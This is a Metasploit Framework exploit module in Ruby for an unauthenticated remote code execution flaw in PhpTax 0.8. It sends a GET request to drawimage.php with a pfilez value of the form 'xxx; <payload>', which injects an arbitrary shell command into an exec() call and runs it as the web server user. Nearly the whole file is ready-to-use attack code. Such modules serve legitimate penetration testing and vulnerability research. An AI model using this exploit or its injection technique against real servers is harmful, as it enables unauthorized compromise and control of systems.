##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "PhpTax pfilez Parameter Exec Remote Code Injection",
			'Description'    => %q{
					This module exploits a vulnerability found in PhpTax, an income tax report
				generator.  When generating a PDF, the icondrawpng() function in drawimage.php
				does not properly handle the pfilez parameter, which will be used in a exec()
				statement, and then results in arbitrary remote code execution under the context
				of the web server.  Please note: authentication is not required to exploit this
				vulnerability.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Jean Pascal Pereira <pereira[at]secbiz.de>',
					'sinn3r'  #Metasploit
				],
			'References'     =>
				[
					['EDB', '21665']
				],
			'Payload'        =>
				{
					'Compat' =>
					{
						'ConnectionType' => 'find',
						'PayloadType'    => 'cmd',
						'RequiredCmd'    => 'generic perl ruby bash telnet python'
					}
				},
			'Platform'       => ['unix', 'linux'],
			'Targets'        =>
				[
					['PhpTax 0.8', {}]
				],
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'DisclosureDate' => "Oct 8 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The path to the web application', '/phptax/'])
			], self.class)
	end


	def check
		target_uri.path << '/' if target_uri.path[-1,1] != '/'
		res = send_request_raw({'uri'=>target_uri.path})
		if res and res.body =~ /PHPTAX by William L\. Berggren/
			return Exploit::CheckCode::Detected
		else
			return Exploit::CheckCode::Unknown
		end
	end


	def exploit
		target_uri.path << '/' if target_uri.path[-1,1] != '/'

		print_status("#{rhost}#{rport} - Sending request...")
		res = send_request_cgi({
			'method'   => 'GET',
			'uri'      => "#{target_uri.path}drawimage.php",
			'vars_get' => {
				'pdf'    => 'make',
				'pfilez' => "xxx; #{payload.encoded}"
			}
		})

		handler
	end
end
